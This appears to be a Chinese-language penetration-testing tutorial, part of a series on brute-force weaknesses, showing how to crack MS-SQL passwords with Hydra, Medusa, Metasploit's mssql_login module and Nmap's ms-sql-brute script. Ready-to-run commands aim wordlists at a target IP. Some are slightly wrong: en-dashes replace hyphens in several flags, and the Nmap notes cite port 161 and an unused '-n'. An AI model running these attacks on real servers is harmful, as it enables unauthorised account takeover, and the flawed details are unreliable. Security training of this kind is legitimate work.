web渗透测试----5、暴力破解漏洞--（9）MS-SQL密码破解

---

MS SQL是指微软的SQLServer数据库服务器，它是一个数据库平台，提供数据库的从服务器到终端的完整的解决方案，其中数据库服务器部分，是一个数据库管理系统，用于建立、使用和维护数据库。
默认端口：1433。

一、hydra

Hydra 是一个并行的登录破解器，它支持多种攻击协议。它非常快速和灵活，并且新模块很容易添加。kali工具集已集成。

hydra项目地址：https://github.com/vanhauser-thc/thc-hydra/releases全版本

hydra支持：
Cisco AAA、Cisco auth、Cisco enable、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、HTTP(S)-HEAD、HTTP-代理、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NNTP、Oracle 侦听器、Oracle SID、PC-Anywhere、PC-NFS、POP3、PostgreSQL、RDP、Rexec、Rlogin、Rsh、SIP、SMB(NT) 、SMTP、SMTP 枚举、SNMP v1+v2+v3、SOCKS5、SSH（v1 和 v2）、SSHKEY、Subversion、Teamspeak (TS2)、Telnet、VMware-Auth、VNC 和 XMPP`。

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt IP mssql

-L：指定用户名字典路径
-P：指定密码字典路径

二、Medusa

Medusa 是一个快速、并行和模块化的登录暴力破解器。目标是支持尽可能多的允许远程身份验证的服务。kalikali工具集已集成。

文档：
www.foofus.net/jmk/medusa/medusa.html
源代码：
https://github.com/jmk-foofus/medusa
https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz

主要功能如下：
1、基于线程的并行测试：可以同时针对多个主机、用户或密码执行蛮力测试。
2、灵活的用户输入：可以通过多种方式指定目标信息（主机/用户/密码）。例如，每个项目可以是单个条目，也可以是包含多个条目的文件。此外，组合文件格式允许用户细化他们的目标列表。
3、模块化设计：每个服务模块作为一个独立的 .mod 文件存在。这意味着无需对核心应用程序进行任何修改即可扩展支持的服务列表以进行暴力破解。
4、支持多种协议：当前支持许多服务（例如 SMB、HTTP、POP3、MS-SQL、SSHv2 等）。

medusa -h IP –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql

-U：表示用户名列表的路径
-P：表示密码列表的路径
-M：指定爆破参数类型

三、Metasploit

use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set rhosts IP
msf auxiliary(scanner/mssql/mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true
msf auxiliary(scanner/mssql/mssql_login) > run

四、NMAP

nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt IP

-p：指定端口号161
-n：不做DNS解析
--script ms-sql-brute：指定使用ms-sql-brute脚本进行扫描
--script-args：指定脚本参数
userdb：指定用户名和密码列表路径/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt